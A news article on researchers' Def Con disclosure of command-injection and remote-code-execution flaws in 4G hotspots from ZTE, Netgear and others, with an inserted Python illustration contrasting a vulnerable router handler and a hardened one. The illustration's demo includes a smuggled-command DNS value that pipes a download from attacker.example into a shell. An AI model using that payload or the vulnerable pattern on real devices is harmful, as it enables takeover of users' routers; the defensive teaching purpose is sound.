Warning As 4G Hotspots Are Hacked, Putting Millions Of Users At Risk


4G hotspots can be hacked, according to security researchers who shared their findings at Def Con this weekend. The team at Pen Test Partners claimed to have found "multiple vulnerabilities" in devices sourced from well known vendors. "A lot of existing 4G modems and routers are pretty insecure," the team explained. "We found critical remotely-exploitable flaws in a selection of devices from a variety of vendors, without having to do too much work."

As the world awaits the promise of 5G, "manufacturers who are going to be selling 5G routers are currently selling 3G and 4G routers, which—and we really cannot stress this enough—are mainly bad." That leads to a further note of caution. The small pool of "OEMs working seriously with cellular technologies" is likely to carry the same vulnerable device software over to new 5G devices. That could have a high impact, as consumers look at 5G routers as entry points into the new networking technology.

Those vulnerabilities included command injection and remote code execution. The attack could be as simple as waiting for a user behind a vulnerable device to visit a maliciously coded website. Once that has happened, traffic from the hotspot can be redirected by the attacker. On some devices, the attacker can also pull stored passwords, giving access to logs of websites visited and other user information.
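The attack path described above, a malicious web page reaching the hotspot's admin interface from the victim's own browser and landing in a command-injection bug, is the familiar pairing of cross-site request forgery with a shell command built from user input. The Python below is an added illustration, not code from Pen Test Partners or from any vendor named in this story; the `dns1` form field, the `/sbin/set_dns` helper and the router hostnames in `ROUTER_HOSTS` are assumptions. It shows the weak pattern beside a hardened handler that validates the DNS value as an IP literal, never hands it to a shell, and refuses requests whose Host, Origin and CSRF token do not match the router itself.

```python
"""
Hypothetical 4G hotspot admin handler (added illustration, not vendor code):
the cross-site request + command-injection pattern beside a hardened version.
The form field, hostnames and the /sbin/set_dns helper are assumptions.
"""
import hmac
import ipaddress
from urllib.parse import urlparse

# Assumed names the router's own admin UI is served under (LAN IP and a local name).
ROUTER_HOSTS = {"192.168.0.1", "router.hotspot.lan"}

# Shell metacharacters that let a value escape the single command it was meant for.
SHELL_META = set(";|&$`\n()")


def build_dns_command_vulnerable(form: dict) -> str:
    """Weak pattern: the user-supplied DNS server is interpolated straight into a
    shell line. Returns the string that would go to /bin/sh (never executed here)."""
    dns1 = form.get("dns1", "")
    return f"echo nameserver {dns1} > /etc/resolv.conf"


def build_dns_command_hardened(form: dict) -> list:
    """Hardened: parse the value as an IP literal (ValueError on anything else) and
    return an argv list so no shell ever interprets it."""
    dns1 = ipaddress.ip_address(form.get("dns1", ""))
    return ["/sbin/set_dns", str(dns1)]  # /sbin/set_dns is a hypothetical helper


def is_trusted_request(headers: dict, form: dict, session_csrf: str) -> bool:
    """Cross-site defence for a LAN admin interface.

    * Host must be the router itself (blocks DNS rebinding, where an attacker's
      hostname is pointed at the router's LAN address).
    * Origin (or Referer) must be the router itself (blocks a plain cross-site
      POST fired from an attacker-controlled page).
    * The form must carry the session's CSRF token, compared in constant time.
    """
    host = headers.get("Host", "").split(":")[0]
    if host not in ROUTER_HOSTS:
        return False
    origin = headers.get("Origin") or headers.get("Referer") or ""
    if urlparse(origin).hostname not in ROUTER_HOSTS:
        return False
    return hmac.compare_digest(form.get("csrf", ""), session_csrf)


def handle_set_dns(headers: dict, form: dict, session_csrf: str) -> list:
    """Hardened request flow: refuse untrusted requests, then build a safe argv."""
    if not is_trusted_request(headers, form, session_csrf):
        raise PermissionError("cross-site or unauthenticated request rejected")
    return build_dns_command_hardened(form)


def injection_attempt(cmd: str) -> bool:
    """True if a would-be shell line contains metacharacters, the injection telltale."""
    return any(ch in SHELL_META for ch in cmd)


if __name__ == "__main__":
    # Constructed payload: a valid-looking address followed by a second command.
    evil = {"dns1": "8.8.8.8; wget http://attacker.example/x -O- | sh", "csrf": "guess"}
    cross_site = {"Host": "192.168.0.1", "Origin": "http://attacker.example"}
    same_site = {"Host": "192.168.0.1", "Origin": "http://192.168.0.1"}

    cmd = build_dns_command_vulnerable(evil)
    print("vulnerable shell line :", cmd, "| injection:", injection_attempt(cmd))
    try:
        handle_set_dns(cross_site, evil, "real-token")
    except PermissionError as e:
        print("hardened, cross-site  :", e)
    try:
        handle_set_dns(same_site, evil, "guess")
    except ValueError as e:
        print("hardened, bad value   :", e)
    good = {"dns1": "1.1.1.1", "csrf": "tok"}
    print("hardened, good request:", handle_set_dns(same_site, good, "tok"))
```

The Host check matters as much as the Origin check: a browser will happily send a cross-site form POST with a forged-looking destination, and an attacker who controls DNS for their own domain can point it at the router's LAN address, so the router must insist that both the page's origin and the requested Host are its own before it touches anything that ends up in a shell or in the DNS configuration.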

Most of the 4G routers contained multiple layers that presented openings for an attack—the underlying Linux OS and then both normal IP router and cellular interfaces. "We’ve reported everything we found to vendors, who have mainly fixed the issues (except when they haven’t—and by now they’ve had more than long enough)."

The research criticized vendors for being "generally poor at responding to disclosure attempts," and singled out China's ZTE for dismissing concerns as relating to an end-of-life product (the MF910), meaning the issue would not be fixed. Despite this, the researchers found ZTE "was still selling [the device] from their own online store."

The team then tested a separate ZTE device (MF920), finding "almost the exact same issues." The vulnerability on the newer device has been fixed, but the researchers believe this shows that ZTE is addressing the issue on a "per-device" basis, despite the shared codebase.

The team found a different set of issues on Netgear's Nighthawk M1, and provide what they claim to be a "walkthrough of how one might fully decrypt any current Netgear Nighthawk M1 firmware using only 'easily-Googleable' public information" here.

A spokesperson for Netgear told me that "the company is aware of a report related to firmware image encryption on the MR1100, also known as the Netgear M1 Mobile Router. It was reported that a Netgear M1 Mobile Router firmware image was partially decrypted, which simplifies the process of looking for potential security weaknesses. The report did not identify any security-related vulnerabilities in the firmware itself."

Although Netgear "continues to be committed to exploring new methods of enhancing firmware image security," the spokesperson said that the company "has no current plans" to issue a release for the M1 router because "the image encryption is stripped off as part of the Netgear M1 Mobile Router firmware update process and has no operational impact on the usage of the product; at this time, no security issues related to the Netgear M1 Mobile Router firmware have been identified as a result of bypassing the firmware image encryption; and changing the encryption mechanism for existing products in the field cannot be done without exposing the new encryption keys and methods to the same reverse engineering techniques in the report."

ZTE was also approached for any comments on this story.

The Pen Test Partners team found other issues with other device manufacturers, they say, which have not been disclosed, although the affected vendors have been informed. They did hint at a "post-authentication DoS in a Huawei dongle and a few command injections in a TP-Link router," though.

There is plenty of cautionary advice warning users of the dangers of public hotspots, the need to use VPNs, or the case for avoiding such networks altogether. It is the same advice that has long been given for hotel and airport Wi-Fi: a trade-off between security and convenience. But, at least according to this research, even private hotspots can be a danger to their users.

Just as worryingly, the research also suggests that a common and vulnerable code base could well be an endemic issue for certain flavors of devices, with no signs that the issues will be fully resolved anytime soon. And the danger with that is that these vulnerabilities are now out in the open, leaving users at even more risk than before.

Updated on 17 August with statement from Netgear
